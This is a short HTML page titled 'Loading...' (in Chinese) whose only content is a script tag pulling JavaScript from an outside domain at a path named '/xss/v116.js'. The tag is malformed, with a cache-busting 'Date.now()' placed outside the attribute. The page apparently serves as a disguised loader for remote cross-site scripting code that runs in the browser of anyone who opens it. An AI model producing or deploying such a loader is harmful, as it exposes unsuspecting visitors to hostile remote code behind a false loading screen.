<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<title>正在加载...</title>
</head>
<body>
<script src="https://jiangpingcy.cn/xss/v116.js?"+ Date.now()></script>
</body>
</html>
